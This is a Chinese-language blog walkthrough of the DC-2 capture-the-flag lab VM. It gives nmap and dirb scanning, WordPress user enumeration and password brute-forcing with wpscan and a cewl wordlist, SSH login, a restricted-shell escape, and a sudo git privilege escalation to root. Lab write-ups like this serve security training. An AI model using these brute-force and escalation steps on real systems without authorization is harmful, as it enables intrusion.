WHCSRL 技术网

DC-2 靶机

DC-2靶机下载地址: DC-2 | Five86 | DC Challenges

环境:DC-2靶机地址:192.168.1.139

nmap -sP 192.168.1.0/24    查看ip
nmap -A 192.168.1.139      #这里我的靶机IP是132
dirb 192.168.1.139         爆破目录

这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、

然后访问192.168.1.139发现是这个界面,什么也没有看到

(通常是解析造成的)在hosts文件添加对应的ip和域名 保存并退出

vim /etc/hosts   

然后访问192.168.1.139

往下滑发现flag1

根据提示,搜索cewl,发现是一个kali自带的密码生成工具

wpscan --url http://dc-2 --enumerate u  #扫出dc-2的用户  admin  Jerry  tom
vim dc-2_user.txt    #将用户写入该文件
cat dc-2_user.txt    #查看该文件
cewl -w dc2-passwords.txt http://dc-2   将cewl生成的密码写进password

使用wpscan进行爆破

wpscan --ignore-main-redirect --url 192.168.1.139 -U dc-2_user.txt -P dc2-passwords.txt --force

爆出两个用户名和密码

然后用ssh对其中一个进行连接,输入密码

ssh tom@192.168.1.132 -p 7744

接着,,,

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

找到flag3

切换到Jerry用户找到flag4

flag4 提示我们可以使用git,我们可以通过git来提权

sudo -l
sudo git -p help

然后弹出一堆东西最后是个冒号,我们在冒号后面输入

! /bin/bash

然后就到了root用户再输入id ,whoami查看自己的成果

 祝你有一个美好的一天!!!

文章知识点与官方知识档案匹配,可进一步学习相关知识
CS入门技能树Linux入门初识Linux949 人正在系统学习中
推荐阅读